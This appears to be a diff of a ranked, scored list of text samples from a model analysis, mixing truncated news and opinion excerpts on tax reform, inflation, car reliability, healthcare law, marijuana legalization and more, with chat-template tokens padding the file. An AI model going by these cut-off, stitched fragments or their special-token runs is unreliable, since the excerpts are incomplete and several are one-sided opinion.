f_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 83; Score = 643072.0 -<|begin_of_text|>We have a once-in-a-generation opportunity to do something big. President Trump has made tax reform a priority, and we have a Republican Congress that wants to get it done. This is something that Democrats should support too because it’s good for the American people. - -The President is going to seize this opportunity by leading the most significant tax reform legislation since 1986 – and one of the biggest tax cuts in American history. +Rank = 82; Score = 319488.0 +<|begin_of_text|>The service sector is in expansion for the second straight month, with the diffusion index sitting at 53. Anything over 50 is in expansion. Let's take a look at some tables from the February 2010 Non-Manufacturing ISM Report On Business®. -The President has focused on three things since his campaign: job creation, economic growth, and helping low and middle-income families who have been left behind by this economy. He understands that there are a lot of people in this country that feel like they work hard and still can’t get ahead. They are sick of turning their paychecks over to Washington and having no idea how their tax dollars are spent. They are frustrated by a tax code that is so complicated that they can’t even do their own taxes. +* Non-Manufacturing ISM Report On Business® data is seasonally adjusted for Business Activity, New Orders, Prices and Employment. Manufacturing ISM Report On Business® data is seasonally adjusted for New Orders, Production, Employment, Supplier Deliveries and Inventories. -That’s why tax reform is such a big priority for this President. He cares about making the economy work better for the American people. +** Number of months moving in current direction -We are going to cut taxes for businesses to make them competitive, and we are going to cut taxes for the American people – especially low and middle-income families. +NMI (Non-Manufacturing Index) -In 1935, we had a one-page tax form consisting of 34 lines and two pages of instructions. Today, the basic 1040 form has 79 lines and 211 pages of instructions. Instead of a single tax form, the IRS now has 199 tax forms on the individual side of the tax code alone. Taxpayers spend nearly 7 billion hours complying with the tax code each year, and nearly 90% of taxpayers need help filing their taxes. +In February, the NMI registered 53 percent, indicating growth in the non-manufacturing sector for the second consecutive month. A reading above 50 percent indicates the non-manufacturing sector economy is generally expanding; below 50 percent indicates the non-manufacturing sector is generally contracting. -We are going to cut taxes and simplify the tax code by taking the current 7 tax brackets we have today and reducing them to only three brackets: 10 percent, 25 percent, and 35 percent. +NMI HISTORY -We are going to double the standard deduction so that a married couple won’t pay any taxes on the first $24,000 of income they earn. So in essence, we are creating a 0 percent tax rate for the first $24,000 that a couple earns. +INDUSTRY PERFORMANCE (Based on the NMI) -The larger standard deduction also leads to simplification because far fewer taxpayers will need to itemize, which means their tax form can go back to that one simple page. +The nine industries reporting growth in February based on the NMI composite index — listed in order — are: Information; Arts, Entertainment & Recreation; Transportation & Warehousing; Public Administration; Professional, Scientific & Technical Services; Other Services; Retail Trade; Wholesale Trade; and Finance & Insurance. -Families in this country will also benefit from tax relief to help them with child and dependent care expenses. +The eight industries reporting contraction in February — listed in order — are: Educational Services; Health Care & Social Assistance; Management of Companies & Support Services; Construction; Utilities; Accommodation & Food Services; Real Estate, Rental & Leasing; and Mining. -We are going to repeal the Alternative Minimum Tax (AMT). The AMT creates significant -================================================================================ -Rank = 84; Score = 638976.0 -<|begin_of_text|>"You must be the only person worried about inflation, Liam". So I was told on Newsnight last week – by someone who's spent four of the last five years in the cabinet. +City, State Cutbacks Coming -Almost lost for words, I blurted an answer before Mr Paxman intervened. +In an amazingly candid appraisal of the sorry state of affairs in New Jersey, Governor Chris Christie laid it on the line in a speech to about 200 mayors at the New Jersey League of Municipalities. -But I left the television studio shocked that the former minister, someone of genuine ability, could be so ignorant of life beyond the Westminster village. +The speech is 24 minutes long and well worth a listen because it is both an honest admission of the problem, and a refreshingly accurate appraisal of what the solutions are. He chastised the legislature, unions, municipalities, and affordable housing initiatives while promising to do something about all of those. -"Inflation, not deflation" is a recurrent theme of this column. That's because the Western world's response to the "credit crunch", this orgy of wildly expansive policy using "deflation is nigh" as an alibi, amounts to a repeated whacking of the self-destruct button. +Points Covered -Almost everyone outside the "political and media elite" knows this. Amidst "deflation is upon us" warnings from this elite, UK CPI inflation went up last month – to 3.2pc. CPI understates true inflation. But even CPI is above the Bank of England's target – and has been for 17 months. +He froze aid to schools -So if I'm the only one worried, why is Mervyn King writing repeated letters acknowledging inflation is too high? +Challenged school boards. -Sterling is down a third in 18 months. Import prices are soaring. The UK's monetary base is doubling. +Wants to change arbitration rules for public workers -"Broad" M4 money is expanding at 16pc a year. Food price inflation is 8pc, with double-digit producer price inflation too – as the credit crunch destroys supply chains. +Requests public-private salary and benefits parity -Warren Buffett, the most successful living investor, foresees an "inflation onslaught". Peter Brabeck, the Nestlé chairman and one of the world's top businessmen, says "Now the printing machine is starting, this is the start of inflation." +Demands pension reform -China and other major creditors are rightly concerned Western governments – particularly the US and UK – want to inflate away their sovereign debts. +Property tax hikes not an option -That's why the "bond vigilantes" are stirring and we could very soon face a gilts strike. +Wants to get rid of programs like COAH -If I'm the only one worried about inflation, why is the price of gold so high, with the price of commodities also up sharply – even though the global demand outlook is weak? +Is not thinking about the next election -If I'm the only one worried about inflation, why does the latest report of the Bank of England's pension scheme show it recently changed it allocation of index-linked instruments – the ultimate anti-inflation hedge – from 25pc to more than 70pc of its portfolio? +15,000 Layoffs Coming In San Francisco -Am I the only one worried? I so wish that was true. We face an inflation tsunami. And +As many as 15,000 unionized city workers are anticipating layoffs on Friday in part of a ================================================================================ -Rank = 85; Score = 634880.0 -<|begin_of_text|>Andy Blatchford, The Canadian Press +Rank = 83; Score = 317440.0 +<|begin_of_text|>The platinum coin died yesterday, the casualty of a Treasury Department statement that says that—among other things—the Federal Reserve views the platinum tactic as illegitimate. -OTTAWA -- Fuelled by climbing prices for fresh fruits and vegetables, the pace of Canada's annual inflation rate accelerated last month to 1.6 per cent, Statistics Canada said Friday. +In operational terms, that’s the ballgame. If the Fed won’t play ball then it doesn’t really work. An administration determined to finance the government via platinum coin seigniorage over the objections of the Federal Reserve Board could probably find a way to do it, but a high-profile fight with the Fed would drastically undermine any market reassuring properties of this means of avoiding default. -Inflation grew at its fastest pace in December since late 2014. Last month's number also followed a 1.4 per cent year-over-year increase in November, the agency's latest consumer price index found. +A lot of the ensuing discussion has focused on political tactics. Some feel that by ruling out the coin, the administration has weakened its bargaining position. Administration officials argue, persuasively, that this is backwards. Platinum would have given an out to Republicans. Obama had two choices, one was to cut spending and the other was to resort to this goofy seeming gimmick. He went for gimmickry because that’s how determined he is to spend spend spend. With no alternatives on the table, Obama has the upper-hand in a high-stakes game of chicken. That said, the platinum coin was never about giving Obama a stronger tactical political position. Even if platinum worked extremely well, there would just be a March fight with congressional Republicans over the appropriations bills. The idea of the platinum coin was to avoid a high-stakes game of chicken whose mere existence is bad for America and the world. -The figure came out as the economy deals with the effects of the steep slide in commodity and oil prices, which have also helped drag down Canada's exchange rate. The lower loonie is expected to drive up costs for imported goods. +That’s now not going to happen. -The report said prices for fresh fruit increased 13.2 per cent last month compared to a year earlier, while fresh vegetables rose 13.3 per cent. +All that said, I’m glad we had this conversation. Direct discussion of the platinum coin was a good reminder that many people, including influential media figures, appear to have no idea what money is or how the monetary system works. Apart from the shockingly widespread view that the value of coins is determined by their metallic content, there was a lot of insistence that creating money was somehow an act of “magic.” In fact, the way all legal currency is created is that a government agency creates the money. Typically that’s the Federal Reserve accommodating bank demand for base money. But all kinds of things can happen. Forget “Quantitative Easing.” When the Fed does the thing that reporters call “raising interest rates” it doesn’t pull an interest rate lever. It sells bonds on the open market in exchange for money. And when that money enters the Fed, it vanishes. When they “lower interest rates” they buy bonds on the open market in exchange for money. Where do they get the money? From nowhere. They just make it. That’s money. Whether the +================================================================================ +Rank = 84; Score = 313344.0 +<|begin_of_text|>Show full PR text -The price of lettuce surged 21.8 per cent. +Consumer Reports Auto Reliability Survey: Ford Continues Fall While Seven Japanese Brands Top List -Overall, consumers spent 3.7 per cent more on food last month than the previous year. +Audi and Cadillac make major jumps in rankings -On top of higher produce prices, Canadians were also paying considerably more for home and mortgage insurance, automobiles and electricity compared to a year earlier, the report said. +December 2012 CoverYONKERS, NY-A perfect storm of reliability problems has dropped Ford to next to last among the 28 car brands ranked in Consumer Reports 2012 Annual Auto Reliability Survey, while its luxury brand, Lincoln, placed just a notch higher. The findings were released today before the Automotive Press Association in Detroit. -The agency said lower prices for gasoline, natural gas and fuel oil applied downward pressure on inflation. Gasoline prices were down 4.8 per cent compared to December 2014, while natural gas decreased 12.9 per cent and fuel oil dropped by 16.8 per cent. +Only two years ago, Ford was Detroit's poster child for reliability. It cracked the top 10 among brands in Consumer Reports predicted-reliability scores, with more than 90 percent of its models being average or better. This year the top seven spots are all held by Japanese brands. -But the slipping price of energy slowed somewhat, which allowed overall inflation to creep up, said Dawn Desjardins, deputy chief economist for RBC. +"Ford's bumpy road can be seen in the numbers. Sixty percent of Ford-branded models and half of Lincolns were below average in predicted reliability, and none placed above average," said Jake Fisher, director of automotive testing for Consumer Reports. -"We all knew that there was going to be this huge weight on that headline rate because of the energy and now we're seeing some relief from that," Desjardins said. +Several factors contributed to Ford's decline in Consumer Reports' reliability rankings. A few new or redesigned models, including the Explorer, Fiesta, and Focus, came out of the gate with more problems than normal. Ford has also added the MyFord/MyLincoln Touch electronic infotainment system, which has been problematic so far, to many vehicles. In addition, three historically reliable models-the Ford Escape, Fusion and the Lincoln MKZ-are not included in the analysis; the three were redesigned for 2013 and CR doesn't yet have reliability data on them. -"It's kind of following the script, if you will, of what forecasters were looking for." +Toyota, on the other hand, has excelled in Consumer Reports' latest ratings. Its three brands-Scion, Toyota, and Lexus-swept the top spots. Toyota is clearly setting the pace in reliability. Of the 27 models in the brand's lineup, 16 earned the highest rating. The subcompact Toyota Prius C earned Consumer Reports' top score overall. The hatchback Prius, the larger Prius V, and the new Prius plug-in were also above average. -To help explain the inflation-cooling effect, some analysts also pointed to the sharp monthly decline in the price of clothing and footwear, which fell 5.2 per cent from November to December. +The Toyota trio was followed by four other Japanese makes: Mazda, Subaru, Honda, and Acura, in that order. All of the models produced by the top seven brands had average or better reliability. And of the 90 Japanese models reflected in Consumer Reports' brand comparison, 86 were average or better, with 35 earning the highest rating. -But moving forward, National Bank senior economist Matthieu Arseneau predicts shoppers will continue to face higher prices for imported goods in many categories. +Leading the Europeans, Audi had its best showing ever, moving up +================================================================================ +Rank = 85; Score = 311296.0 +<|begin_of_text|>The male is often troubled by concerns that his penis is not large enough to satisfy his partner or himself. He is ashamed to have others view his penis, especially in the flaccid state. Such concerns might be unfounded in reality and might be a presentation of social anxiety or some other clinical problem, such as erectile dysfunction. Concern over the size of the penis, when such concern becomes excessive, might present as the ‘small penis syndrome’, an obsessive rumination with compulsive checking rituals, body dysmorphic disorder, or as part of a psychosis. However, it is often a worry that can be described as within the normal experience of many men. Various potential causal factors are considered. A thorough assessment, normalizing the worry and then exploring the treatment options in detail with the man, is essential to allow the matter to be consolidated satisfactorily within the male ego. -"Despite weak energy prices, we don't expect Canadian consumers to get some respite because the dive in the currency should be a significant offset," Arseneau wrote in a note to clients. +Abbreviations SPS small penis syndrome BDD body dysmorphic disorder (dysmorphophobia) ED erectile dysfunction CBT cognitive behavioural therapy SSRI selective serotonin reuptake inhibitor. -By region, Statistics Canada found that consumer prices increased in every province last month compared to the year before, with British +INTRODUCTION The penis, particularly in its erect state, is a symbol of masculinity. In many cultures it has come to symbolise attributes such as ‘largeness, strength, endurance, ability, courage, intelligence, knowledge, dominance over men, possession of women; a symbol of loving and being loved’. A review [1] is recommended which describes Indian Sadhus using weights, Dayak men in Borneo piercing the glans and then inserting items in the resultant holes to stimulate the partner, and the Topinama of Brazil, who encourage poisonous snakes to bite their penis to make it enlarge (for 6 months!). Some of these concepts date back over many thousands of years, and there is evidence that prehistoric cave dwellers attributed the symbolic values of strength and power to penile size, as well as those of virility and fertility, a process also recommended in the Kama Sutra [2]. Given the historical context it is perhaps no surprise that even today many men place great importance on the size of their penis. Hegemonic masculinity is defined by attributes such as physical strength, heterosexuality with authority over women and other men, showing no emotions (such as remorse and uncertainty, which might suggest vulnerability), economic independence, and an ability to demonstrate sexual ‘conquest’. While most men do not embody all of these qualities, society supports hegemonic masculinity within most of its institutions [3]. Given this historical and cultural background, it is perhaps unsurprising that for ================================================================================ -Rank = 86; Score = 630784.0 -<|begin_of_text|>Consumers are paying sharply higher prices for beef, and other meat, this year, according to the government's consumer price index for March, released April 15, 2014. (Photo11: Jim Cole AP) +Rank = 86; Score = 311296.0 +<|begin_of_text|>Originally, the term “movies” did not mean films, but the people who made them. It was generally used with disdain by early Hollywood locals who disliked the “invading” Easterners. [1] -Two months of sharp increases in food prices show grocers are starting to pass along their higher wholesale costs to consumers. +The first film ever made in Hollywood was D.W. Griffith’s 1910 In Old California, a biograph melodrama about a Spanish maiden (Marion Leonard) who has an illegitimate son with a man who later becomes governor of California. It was shot in two days. [6] -Retail food prices rose 0.4% in March, the same as in February and the largest amount since September 2011. By comparison, the prices of all consumer goods rose 0.2% in March and 0.1% the month before, reports the Bureau of Labor Statistics. +When Horace and Daeida Wilcox founded Hollywood in 1887, they hoped it would become a religious community. Prohibitionists, they banned liquor from the town and offered free land to anyone willing to build a church. [25] -Beverly Cabellon, 61, of Pleasant Hill, Calif., was taken aback by the $38 price for two steaks at Costco recently, up from the $27 she paid last September. "I will be grilling more vegetables and shrimp this summer," she says, adding that she and her husband will likely eat beef once a month instead of weekly. "And I may switch to pork and chicken." +The most filmed author is William Shakespeare, including straight film versions, modern adaptations, ( West Side Story [1961], The Lion King [1994], etc.) and Shakespeare parodies. [1] -Beef, pork, poultry, eggs and milk have had the most dramatic price increases as drought, a virus outbreak and rising exports have thinned U.S. supplies. +The shortest dialogue script since the introduction of talkies was written for Mel Brook’s Silent Movie (1976), which has only one spoken word throughout: “Non.” [1] -Overall consumer prices rose 0.2% in March, a bit more rapidly than in recent months, and annual inflation was 1.5%, up from 1.1% in February. +The first motion picture to depict a non-pornographic sex act was Extase (1933) starring Hedwig Kiesler, known later as Hedy Lamarr (1913-2000). Her character flees from an impotent husband, runs naked through the woods, bathes, and then has sex with a young engineer in a hut.l [17] -Annual inflation was 1.5% in March, up from 1.1% in February. That's well below the Federal Reserve's 2% target, as falling gasoline prices offset rising food costs. +Though photos have survived, the movie A Daughter of the Gods is now considered lost -But higher food bills are squeezing households still struggling with meager wage gains, and could crimp spending just as the recovery is expected to accelerate. +The first nude scene in a major motion picture was of swimmer and actress Annette Kellerman (1887-1975) in A Daughter of the Gods (1916). [17] -Cheryl Stewart, 38, of Perry Hall, Md., says higher prices for meat and milk have prompted her to drive 10 to 15 miles to grocery stores in low-income areas that carry more obscure brands at lower prices. She also spreads the food shopping for her family among three or four stores to get the best prices. +The earliest known American pornographic film is the 1915 A Free Ride, a.k.a. A Grass Sandwich. The film was directed by “A. Wise Guy” and was written by “Will She.” [17] -"Living standards will suffer as a larger percentage of household budgets are spent on grocery store bills, leaving less for discretionary spending," says economist Chris Christopher of IHS Global Insight. +The Western Hero most portrayed on screen has been William Frederick Cody, a.k.a. Buffalo Bill, followed by William Bonny, a.k.a. Billy the Kid. [17] -A drought that thinned cattle herds two years ago has driven up wholesale beef prices 23% the past year, according to Sterling Marketing. Meanwhile, a virus outbreak in the hog population has pushed up pork prices by 56%, the +The first African-American to play a leading role in a feature film was Sam Lucas (1850-1916) who was cast in the title role of Uncle Tom’s Cabin (1914). The first African-American actor to make a career in films was Noble Johnson (1881-1978). [17] + +The American Humane ================================================================================ -Rank = 87; Score = 626688.0 -<|begin_of_text|>In the first place, studies that measure income inequality largely focus on pretax incomes while ignoring the transfer payments and spending from unemployment insurance, food stamps, Medicaid and other safety-net programs. Politicians who rest their demands for more redistribution on studies of income inequality but leave out the existing safety net are putting their thumb on the scale. +Rank = 87; Score = 311296.0 +<|begin_of_text|>WASHINGTON (Reuters) - Texan Sam Lovett had no health insurance in August 2010 when an emergency hospital stay brought the news from his doctors that his liver was failing and he could die within less than a year without a transplant. -Second and more important, it is well known that people's earnings in general rise over their working lifetime. And so, for example, a person who decides to invest more in education may experience a lengthy period of low income while studying, followed by significantly higher income later on. Snapshot measures of income inequality can be misleading. +The small distribution center where he worked did not provide health insurance. Lovett, 43, who lives near Comfort, Texas, was not able to buy private coverage on his own because of his already bad health. Though he had the resources to cover routine medical bills, he now needed a $400,000 organ transplant and no doctor or clinic would take him without insurance. -According to data from the Bureau of Labor Statistics' Consumer Expenditure Survey, if you sort households according to their pretax income, in 2010 the bottom fifth accounted for 8.7% of overall consumption, the middle fifth for 17.1%, and the top fifth for about 38.6%. Go back 10 years to 2000—before two recessions, the Bush tax cuts, and continuing expansions of globalization and computerization—and the numbers are similar. The bottom fifth accounted for 8.9% of consumption, the middle fifth for 17.3%, and the top fifth for 37.3%. +“They were making arrangements to send me to a hospice. One doctor flatly told me that I had a better chance of leaving the hospital dead than alive,” said Lovett, who had a history of alcoholism and obesity. -While this stability is something to applaud, surely more important are the real gains in consumption by income groups over the past decade. From 2000 to 2010, consumption has climbed 14% for individuals in the bottom fifth of households, 6% for individuals in the middle fifth, and 14.3% for individuals in the top fifth when we account for changes in U.S. population and the size of households. This despite the dire economy at the end of the decade. +But in the months that followed, Lovett was able to enroll in the Pre-Existing Condition Insurance Plan (PCIP). The program was created by the healthcare law that President Barack Obama, a Democrat, signed in March 2010 despite the united opposition of Republicans in Congress. The program paid for Lovett’s transplant surgery at the Mayo Clinic in Phoenix last December. -The percentage of low-income households with microwave ovens grew to 92.4% from 74.9% between 2001 and 2009. Fully 75.5% of low-income Americans now have a cell phone, and over a quarter of those have access to the Internet through their phones. +PCIP is a temporary government program set up to run until 2014, when the Obama healthcare law is due to take full effect and prevent insurance companies from the common practice of denying people coverage due to pre-existing medical conditions. About 60,000 Americans already are receiving medical coverage through the program, according to the Obama administration. -We would hazard a guess that if you were to ask a typical low-income American in 2009 if he would like to trade his house for its 2001 version, he would tell you to take a hike. How then is he worse off in 2009? +As the U.S. Supreme Court prepares to rule in the next few weeks on whether to overturn the law considered to be Obama’s signature domestic policy achievement, Lovett said the choice is very clear for him and others unable to get insurance without the statute’s provisions. -So poor people are not in fact getting worse off because when they get worse off, we give them food stamps. That's exactly the sort of deep thinking I would +“Without this, you’re going to die,” Lovett said in an interview arranged by the Consumers Union organization, which supports the law. “From my perspective, that’s what the Supreme Court will sanction, or not - whether people will be allowed to die because they can’t get insurance.” + +Unlike people in many other rich nations where health insurance is near universal, many Americans struggle without medical coverage even as the country pays more for healthcare than anywhere else in the world. The U.S. healthcare system is a patchwork of private insurance and restrictive government programs that has left tens of millions uninsured. + +Many Americans receive health insurance only because their employers provide it as a job benefit. But some companies, particularly smaller employers, do not offer it. ================================================================================ -Rank = 88; Score = 626688.0 +Rank = 88; Score = 309248.0 <|begin_of_text|>Media playback is unsupported on your device Media caption Bank of England chief Mark Carney: BoE taking steps to avoid'mortgage recklessness' Annual house price inflation hit 10.5% in May, the highest rate for four years, according to the Office for National Statistics (ONS). @@ -1914,199 +1934,173 @@ The housing charity Shelter said the only answer was more house-building. "Instead scores of people are either stuck in their childhood bedrooms or forced to bring up children in unstable and expensive rented homes, however hard they work or save," he said.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 89; Score = 610304.0 -<|begin_of_text|>Pin 23 24 Shares - -How to Install and Configure SSL Certificate - -Hyper Text Transfer Protocol Secure (https) website is encrypted site. Encrypted site means that website is secured. HTTPS site is secured by using Secure Sockets Layer (SSL). SSL certificates are issued by the Certificate Authority (CA). We can check that particular website is HTTPS or not by checking a ‘green colour lock‘ and https: in the address bar before the website name. For example, all banking websites are working on https. Some of the examples of secure websites are “https://www.google.com“, “https://www.facebook.com” and many more. In this article, we’ll learn the steps to install and configure SSL certificate server and CA. - -Install and configure SSL certificate would encrypt (secure) our website so that no one can easily decode the information or data transferred by web servers to the clients. Sharing confidential information over internet is not safe that is why https is used to encrypt our data for safe transfer. - -Steps to install and configure SSL Certificate on Windows Server 2012 R2. - -1. To install and configure SSL certificate server, we need to install the “Active Directory Certificate Services” role. Open “Server Manager” and click on “Add roles and features“. - -2. Please ensure that password is set for local Administrator and valid static IP address is assigned to the Server. Click next to continue. - -3. Select an option “Role-based or feature-based Installation” and click on next. - -4. Select the server from the pool on which we need to install and configure SSL Certificate. +Rank = 89; Score = 307200.0 +<|begin_of_text|>In the first place, studies that measure income inequality largely focus on pretax incomes while ignoring the transfer payments and spending from unemployment insurance, food stamps, Medicaid and other safety-net programs. Politicians who rest their demands for more redistribution on studies of income inequality but leave out the existing safety net are putting their thumb on the scale. -5. Select the role “Active Directory Certificate Services” and click on next to continue. +Second and more important, it is well known that people's earnings in general rise over their working lifetime. And so, for example, a person who decides to invest more in education may experience a lengthy period of low income while studying, followed by significantly higher income later on. Snapshot measures of income inequality can be misleading. -6. Certain features are required to install and configure SSL Certificate Services role, click on “Add Features” to install all the dependent features. +According to data from the Bureau of Labor Statistics' Consumer Expenditure Survey, if you sort households according to their pretax income, in 2010 the bottom fifth accounted for 8.7% of overall consumption, the middle fifth for 17.1%, and the top fifth for about 38.6%. Go back 10 years to 2000—before two recessions, the Bush tax cuts, and continuing expansions of globalization and computerization—and the numbers are similar. The bottom fifth accounted for 8.9% of consumption, the middle fifth for 17.3%, and the top fifth for 37.3%. -7. Click on next to continue. +While this stability is something to applaud, surely more important are the real gains in consumption by income groups over the past decade. From 2000 to 2010, consumption has climbed 14% for individuals in the bottom fifth of households, 6% for individuals in the middle fifth, and 14.3% for individuals in the top fifth when we account for changes in U.S. population and the size of households. This despite the dire economy at the end of the decade. -8. From features window, you can select additional features if required, however in this practical it is not required, therefore click on next to continue. +The percentage of low-income households with microwave ovens grew to 92.4% from 74.9% between 2001 and 2009. Fully 75.5% of low-income Americans now have a cell phone, and over a quarter of those have access to the Internet through their phones. -9. The name and domain settings of the computer cannot be changed after a CA has been installed on the Server. Therefore make the changes before installing the role. +We would hazard a guess that if you were to ask a typical low-income American in 2009 if he would like to trade his house for its 2001 version, he would tell you to take a hike. How then is he worse off in 2009? -10. From the “Role Services”, select “Certificate Authority” and “Certificate Authority Web Enrollment”. Certificate authority web enrollment allows users to request new, renew, revoke certificates, etc using Web console. +So poor people are not in fact getting worse off because when they get worse off, we give them food stamps. That's exactly the sort of deep thinking I would +================================================================================ +Rank = 90; Score = 305152.0 +<|begin_of_text|>The time is ripe for a rediscovery of Leopold Kohr. Or perhaps better: the time is ripe for the discovery of Leopold Kohr, since few have any idea who he was. A select group of readers might connect him with E.F. Schumaker, author of Small Is Beautiful: Economics as if People Mattered (orig. 1973). Kohr was one of Schumaker’s instructors, and the two remained lifelong associates and friends. -11. Web Server (IIS) role is required for end users to request, renew, revoke certificates. +I. -12. Click on next to continue. +Roughly three years after the Meltdown of 2008 I encountered an article online with the curious title, “This Economic Crisis is a “Crisis of Bigness.” It attracted my attention, because like many other observers I’d become convinced long before that both government and corporations had grown too large to accomplish even well-intentioned goals. The impulses for a more centralized society and a more economically integrated world — the impulses, that is, that bring about “bigness” — were mistakes from the get-go. Globalization promised universal prosperity, but instead has made the rich richer, slowly and painfully begun wiping out the American middle class, and created legions of unemployed or underemployed poor people — precariat is the term some writers are now using for this new class. The precariat consists of the army of adjunct faculty, temps, short-term contract workers, etc., most doing what they are doing because it is the only work they can find in the globalized “new economy.” The underemployment crisis heralds eventual civil unrest, especially with the Bureau of Labor Statistics insisting, against all experience, that the unemployment rate is just 5.5% (the U-3 figure as of this writing). Does anyone really think this is good, whether for workers or the economy at large? -13. Add roles and features wizard +The above article cited Leopold Kohr, on the grounds that he had predicted central aspects of the present situation over half a century ago in his magnum opus The Breakdown of Nations (1957). I immediately ordered Kohr’s book, and when it came, I put every spare minute into reading it straight through. It is not light reading. Works that raise fundamental issues in political philosophy as well as economics never are. I wondered why I’d never heard of Kohr or Breakdown before. Then I realized: unlike someone such as Joseph Schumpeter, whose analysis of the long-term fate of capitalism as an industrial system in Capitalism, Socialism and Democracy (1947) was the most interesting I’d ================================================================================ -Rank = 90; Score = 606208.0 -<|begin_of_text|>From the Kansas City Fed: Tenth District Manufacturing Activity Strengthened Further +Rank = 91; Score = 303104.0 +<|begin_of_text|>A clear majority of Americans now want to see marijuana legalized. Fifty-six percent believe it should be treated like alcohol or tobacco. Only thirty-six percent defend the status quo. What's more, the trend has been moving towards the pro-legalization position, and continues to do so. -The Federal Reserve Bank of Kansas City released the March Manufacturing Survey today. According to Chad Wilkerson, vice president and economist at the Federal Reserve Bank of Kansas City, the survey revealed that Tenth District manufacturing activity strengthened further with strong expectations for future activity. +It is about time. The entire drug war is a monstrosity, a crime against the Bill of Rights, the greatest contributor to gang violence, a wholesale attack on our civil liberties and the right of individuals to control their own bodies. Characterizing drug problems as a criminal justice issue has been an unmitigated failure, except for serving law-enforcement special interests, growing the bureaucracy, and deepening the pockets of drug kingpins who profit off this madness. -“Our composite index accelerated again, and has only been higher one time in the last 15 years,” said Wilkerson. “The future employment index was the strongest in the 23-year history of the survey." +Marijuana criminalization always rested on the flimsiest of grounds. Fear of blacks and Hispanics fueled the hysteria. So did conflicting propaganda about how marijuana would make American youth violent, yet also make them docile and unable to serve in the Armed Forces. -... +If marijuana is not the most benign recreational drug known to humanity, it is near the top. Alcohol kills tens of thousands of Americans a year. Tobacco kills hundreds of thousands. Pot directly kills zero. -The month-over-month composite index was 20 in March, its highest reading since March 2011, up from 14 in February and 9 in March. The composite index is an average of the production, new orders, employment, supplier delivery time, and raw materials inventory indexes. Activity in both durable and nondurable goods plants increased, particularly for metals, computer, electronic, and aircraft products. Most month-over-month indexes rose further in March. The production and shipments indexes increased considerably, while the new orders and order backlog indexes rose more moderately but remained high. The employment index moderated slightly from 17 to 13, and the new orders for exports index also eased. Both inventory indexes increased for the second straight month. +Scientists measure the lethality of a drug by its therapeutic index. The TI gauges how many effective doses of a drug it takes to kill the median user. Alcohol's TI is somewhere around ten. Caffeine's is approximately one hundred. Marijuana's is a matter of conjecture, since it's been extrapolated from studies with lab rats and other such methods. But scientists estimate its TI somewhere between 1,000 and 40,000. In other words, marijuana is somewhere between a hundred and four thousand times less lethal than alcohol. -emphasis added +This is not to say that smoking pot has no negative side-effects. Long-term users can easily fritter their time away, satisfied to bask in the high rather than doing something productive. This is a danger with other drugs too, including alcohol, as well as with many other activities like watching sports or playing video games. But the answer is not jail time or a federal program aimed at reforming individuals from these poor habits. A free society does not use police power to deal with frivolousness of youth. -The Kansas City region was hit hard by the decline in oil prices, but activity is expanding solidly again. The regional Fed surveys released so far suggest another strong reading for the ISM manufacturing index for March.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|en